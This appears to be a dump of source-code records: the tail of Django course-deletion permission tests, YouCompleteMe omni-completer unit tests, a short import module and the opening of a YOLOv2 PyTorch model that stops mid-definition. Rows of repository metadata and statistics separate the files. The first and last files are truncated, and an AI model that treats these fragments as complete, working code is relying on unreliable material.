        self._assert_not_allowed(self.client.delete, self._detail_url())

    def test_delete_course_alum(self):
        owner = self.create_test_user_owner()
        alum1 = self.create_test_user_alum1()
        self.client = self.django_login_user(self.client, alum1)
        self.create_test_basic_course(owner, student=alum1)
        self._assert_not_allowed(self.client.delete, self._detail_url())

    def test_delete_course_teacher(self):
        owner = self.create_test_user_owner()
        teacher1 = self.create_test_user_teacher1()
        self.client = self.django_login_user(self.client, teacher1)
        self.create_test_basic_course(owner, teacher=teacher1)
        self._assert_not_allowed(self.client.delete, self._detail_url())

    def test_delete_course_owner(self):
        owner = self.create_test_user_owner()
        self.client = self.django_login_user(self.client, owner)
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.delete, self._detail_url())

    def test_delete_course_admin(self):
        owner = self.create_test_user_owner()
        admin = self.create_test_user_admin()
        self.client = self.django_login_user(self.client, admin)
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.delete, self._detail_url())

    def test_delete_course_userkey(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        key = str(uuid.uuid4())
        self.generate_apikeyuser(user, key)
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.delete, self._detail_url(key))
| 39.346756 | 142 | 0.695872 | 2,372 | 17,588 | 4.901771 | 0.055649 | 0.084287 | 0.098736 | 0.083599 | 0.920272 | 0.918896 | 0.908145 | 0.907457 | 0.907113 | 0.907113 | 0 | 0.015882 | 0.183762 | 17,588 | 446 | 143 | 39.434978 | 0.794023 | 0.038208 | 0 | 0.823944 | 0 | 0 | 0.054513 | 0.010417 | 0 | 0 | 0 | 0.002242 | 0.232394 | 1 | 0.144366 | false | 0.021127 | 0.014085 | 0 | 0.165493 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86e061408526bacd5b57f7d5556ca0828c8e2a62 | 27,028 | py | Python | tabnine-vim/python/ycm/tests/omni_completer_test.py | MrMonk3y/vimrc | 950230fb3fd7991d1234c2ab516ec03245945677 | [
"MIT"
] | null | null | null | tabnine-vim/python/ycm/tests/omni_completer_test.py | MrMonk3y/vimrc | 950230fb3fd7991d1234c2ab516ec03245945677 | [
"MIT"
] | null | null | null | tabnine-vim/python/ycm/tests/omni_completer_test.py | MrMonk3y/vimrc | 950230fb3fd7991d1234c2ab516ec03245945677 | [
"MIT"
] | null | null | null | # encoding: utf-8
#
# Copyright (C) 2016-2018 YouCompleteMe contributors
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, contains, empty, has_entries
from ycm.tests.test_utils import ( MockVimBuffers, MockVimModule, ToBytesOnPY2,
VimBuffer )
MockVimModule()
from ycm import vimsupport
from ycm.tests import YouCompleteMeInstance
# Filetype assigned to every test buffer below.
FILETYPE = 'ycmtest'
# Semantic-trigger map for the test filetype: typing '.' requests
# semantic (omnifunc) completion.
TRIGGERS = {
  'ycmtest': [ '.' ]
}
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_List_test( ycm ):
  # Omnifunc returning a plain list of words; caching enabled. With an
  # empty query after the trigger, every candidate comes back.
  def Omnifunc( findstart, base ):
    return 5 if findstart else [ 'a', 'b', 'cdef' ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 5 ) ):
    ycm.SendCompletionRequest()
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
        'completion_start_column': 6
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ListFilter_test( ycm ):
  # With caching on, YCM filters the cached candidates itself; the query
  # 't' matches none of them, so the response is empty.
  def Omnifunc( findstart, base ):
    return 5 if findstart else [ 'a', 'b', 'cdef' ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.t' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 6 ) ):
    ycm.SendCompletionRequest()
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': empty(),
        'completion_start_column': 6
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_List_test( ycm ):
  # Caching disabled; the omnifunc's list is passed straight through.
  def Omnifunc( findstart, base ):
    return 5 if findstart else [ 'a', 'b', 'cdef' ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 5 ) ):
    ycm.SendCompletionRequest()
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
        'completion_start_column': 6
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ListFilter_test( ycm ):
  def Omnifunc( findstart, base ):
    return 5 if findstart else [ 'a', 'b', 'cdef' ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.t' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 6 ) ):
    ycm.SendCompletionRequest()
    # Caching is off, so the results are NOT filtered by YCM; the omnifunc
    # (or Vim itself) is expected to do the filtering.
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
        'completion_start_column': 6
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_UseFindStart_test( ycm ):
  # findstart of 0 moves the completion start column to the line start.
  def Omnifunc( findstart, base ):
    return 0 if findstart else [ 'a', 'b', 'cdef' ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.t' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 6 ) ):
    ycm.SendCompletionRequest()
    # Caching is off, so the results are NOT filtered by YCM; the omnifunc
    # (or Vim itself) is expected to do the filtering.
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
        'completion_start_column': 1
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_UseFindStart_test( ycm ):
  def Omnifunc( findstart, base ):
    return 0 if findstart else [ 'a', 'b', 'cdef' ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.t' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 6 ) ):
    ycm.SendCompletionRequest()
    # With findstart at the line start the query is 'test.t', which matches
    # no candidate (cache_omnifunc=1, so YCM FilterAndSortCandidates).
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': empty(),
        'completion_start_column': 1
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_Object_test( ycm ):
  # Omnifunc returning the dict form { 'words': [...] }; with caching on,
  # the query 't' keeps only the fuzzy-matching candidate.
  def Omnifunc( findstart, base ):
    return 5 if findstart else { 'words': [ 'a', 'b', 'CDtEF' ] }

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.t' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 6 ) ):
    ycm.SendCompletionRequest()
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': [ 'CDtEF' ],
        'completion_start_column': 6
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectList_test( ycm ):
  # Omnifunc returning a list of completion dicts; with caching on, the
  # query 'tt' keeps only the matching entry.
  def Omnifunc( findstart, base ):
    if findstart:
      return 5
    return [
      {
        'word': 'a',
        'abbr': 'ABBR',
        'menu': 'MENU',
        'info': 'INFO',
        'kind': 'K'
      },
      {
        'word': 'test',
        'abbr': 'ABBRTEST',
        'menu': 'MENUTEST',
        'info': 'INFOTEST',
        'kind': 'T'
      }
    ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.tt' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 7 ) ):
    ycm.SendCompletionRequest()
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': contains( {
          'word': 'test',
          'abbr': 'ABBRTEST',
          'menu': 'MENUTEST',
          'info': 'INFOTEST',
          'kind': 'T'
        } ),
        'completion_start_column': 6
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
                          'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ObjectList_test( ycm ):
  def Omnifunc( findstart, base ):
    if findstart:
      return 5
    return [
      {
        'word': 'a',
        'abbr': 'ABBR',
        'menu': 'MENU',
        'info': 'INFO',
        'kind': 'K'
      },
      {
        'word': 'test',
        'abbr': 'ABBRTEST',
        'menu': 'MENUTEST',
        'info': 'INFOTEST',
        'kind': 'T'
      }
    ]

  vim_buffer = VimBuffer( 'buffer',
                          contents = [ 'test.tt' ],
                          filetype = FILETYPE,
                          omnifunc = Omnifunc )

  with MockVimBuffers( [ vim_buffer ], [ vim_buffer ], ( 1, 7 ) ):
    ycm.SendCompletionRequest()
    # We don't filter the result - we expect the omnifunc to do that based
    # on the query we supplied (Note: that means no fuzzy matching!).
    assert_that(
      ycm.GetCompletionResponse(),
      has_entries( {
        'completions': ToBytesOnPY2( [ {
          'word': 'a',
          'abbr': 'ABBR',
          'menu': 'MENU',
          'info': 'INFO',
          'kind': 'K'
        }, {
          'word': 'test',
          'abbr': 'ABBRTEST',
          'menu': 'MENUTEST',
          'info': 'INFOTEST',
          'kind': 'T'
        } ] ),
        'completion_start_column': 6
      } ) )
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectListObject_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return { 'words': [
{
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
},
{
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
}
] }
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.tt' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 7 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ {
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
} ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ObjectListObject_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return { 'words': [
{
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
},
{
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
}
] }
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.tt' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 7 ) ):
ycm.SendCompletionRequest()
# No FilterAndSortCandidates for cache_omnifunc=0 (we expect the omnifunc
# to do the filtering?)
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ {
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
}, {
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
} ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_List_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ '†est', 'å_unicode_identifier', 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 12 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': [ 'å_unicode_identifier',
'πππππππ yummy πie',
'†est' ],
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_List_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ '†est', 'å_unicode_identifier', 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 12 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ '†est',
'å_unicode_identifier',
'πππππππ yummy πie' ] ),
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_List_Filter_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ '†est', 'å_unicode_identifier', 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.ππ' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 17 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': [ 'πππππππ yummy πie' ],
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_List_Filter_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.ππ' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 17 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'πππππππ yummy πie' ] ),
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectList_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [
{
'word': 'ålpha∫et',
'abbr': 'å∫∫®',
'menu': 'µ´~¨á',
'info': '^~fo',
'kind': '˚'
},
{
'word': 'π†´ß†π',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
}
]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.ππ' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 17 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': [ {
'word': 'π†´ß†π',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
} ],
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectListObject_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return {
'words': [
{
'word': 'ålpha∫et',
'abbr': 'å∫∫®',
'menu': 'µ´~¨á',
'info': '^~fo',
'kind': '˚'
},
{
'word': 'π†´ß†π',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
},
{
'word': 'test',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
}
]
}
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.t' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 13 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': contains( {
'word': 'test',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
}, {
'word': 'ålpha∫et',
'abbr': 'å∫∫®',
'menu': 'µ´~¨á',
'info': '^~fo',
'kind': '˚'
} ),
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_RestoreCursorPositionAfterOmnifuncCall_test(
ycm ):
# This omnifunc moves the cursor to the test definition like
# ccomplete#Complete would.
def Omnifunc( findstart, base ):
vimsupport.SetCurrentLineAndColumn( 0, 0 )
if findstart:
return 5
return [ 'length' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'String test',
'',
'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 3, 5 ) ):
ycm.SendCompletionRequest()
assert_that(
vimsupport.CurrentLineAndColumn(),
contains( 2, 5 )
)
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'length' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_MoveCursorPositionAtStartColumn_test( ycm ):
# This omnifunc relies on the cursor being moved at the start column when
# called the second time like LanguageClient#complete from the
# LanguageClient-neovim plugin.
def Omnifunc( findstart, base ):
if findstart:
return 5
if vimsupport.CurrentColumn() == 5:
return [ 'length' ]
return []
current_buffer = VimBuffer( 'buffer',
contents = [ 'String test',
'',
'test.le' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 3, 7 ) ):
ycm.SendCompletionRequest()
assert_that(
vimsupport.CurrentLineAndColumn(),
contains( 2, 7 )
)
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'length' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1 } )
def StartColumnCompliance( ycm,
omnifunc_start_column,
ycm_completions,
ycm_start_column ):
def Omnifunc( findstart, base ):
if findstart:
return omnifunc_start_column
return [ 'foo' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'fo' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 2 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( ycm_completions ),
'completion_start_column': ycm_start_column
} )
)
def OmniCompleter_GetCompletions_StartColumnCompliance_test():
yield StartColumnCompliance, -4, [ 'foo' ], 3
yield StartColumnCompliance, -3, [], 1
yield StartColumnCompliance, -2, [], 1
yield StartColumnCompliance, -1, [ 'foo' ], 3
yield StartColumnCompliance, 0, [ 'foo' ], 1
yield StartColumnCompliance, 1, [ 'foo' ], 2
yield StartColumnCompliance, 2, [ 'foo' ], 3
yield StartColumnCompliance, 3, [ 'foo' ], 3
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_NoSemanticTrigger_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 0
return [ 'test' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'te' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 3 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 1
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ForceSemantic_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 0
return [ 'test' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'te' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 3 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'test' ] ),
'completion_start_column': 1
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { FILETYPE: 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_FiletypeDisabled_SemanticTrigger_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { '*': 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_AllFiletypesDisabled_SemanticTrigger_test(
ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { FILETYPE: 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_FiletypeDisabled_ForceSemantic_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { '*': 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_AllFiletypesDisabled_ForceSemantic_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 6
} )
)
| 30.853881 | 80 | 0.542992 | 2,407 | 27,028 | 5.929788 | 0.107187 | 0.071043 | 0.045541 | 0.054649 | 0.86513 | 0.850277 | 0.840818 | 0.837946 | 0.816507 | 0.815876 | 0 | 0.011243 | 0.338538 | 27,028 | 875 | 81 | 30.889143 | 0.783421 | 0.059975 | 0 | 0.799451 | 0 | 0 | 0.154874 | 0.053333 | 0 | 0 | 0 | 0 | 0.039835 | 1 | 0.072802 | false | 0 | 0.012363 | 0 | 0.157967 | 0.001374 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86e1078769159b64611b6ae3e06953d4ef503fa3 | 105 | py | Python | workon/flow.py | dalou/django-workon | ef63c0a81c00ef560ed693e435cf3825f5170126 | [
"BSD-3-Clause"
] | null | null | null | workon/flow.py | dalou/django-workon | ef63c0a81c00ef560ed693e435cf3825f5170126 | [
"BSD-3-Clause"
] | null | null | null | workon/flow.py | dalou/django-workon | ef63c0a81c00ef560ed693e435cf3825f5170126 | [
"BSD-3-Clause"
] | null | null | null |
from workon.contrib.flow.pipe import send
from workon.contrib.flow.signals import flow_user_disconnected | 35 | 62 | 0.866667 | 16 | 105 | 5.5625 | 0.625 | 0.224719 | 0.382022 | 0.47191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07619 | 105 | 3 | 62 | 35 | 0.917526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
86e9d8e9747a45b187abf687dee60ffb6a938577 | 3,849 | py | Python | models/model.py | ivanwhaf/yolov2-pytorch | 93770f0a8d25258fd26fee503e05cea72c434cad | [
"MIT"
] | null | null | null | models/model.py | ivanwhaf/yolov2-pytorch | 93770f0a8d25258fd26fee503e05cea72c434cad | [
"MIT"
] | null | null | null | models/model.py | ivanwhaf/yolov2-pytorch | 93770f0a8d25258fd26fee503e05cea72c434cad | [
"MIT"
] | null | null | null | from torch import nn
class YOLOv2(nn.Module):
"""YOLOv2 model structure
"""
def __init__(self, S, num_anchors, num_classes):
super(YOLOv2, self).__init__()
self.S = S
self.num_anchors = num_anchors
self.num_classes = num_classes
# conv part
self.conv_layers = nn.Sequential(
# conv1
nn.Conv2d(3, 32, 3, padding=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv2
nn.Conv2d(32, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv3
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(128, 64, 1),
nn.BatchNorm2d(64),
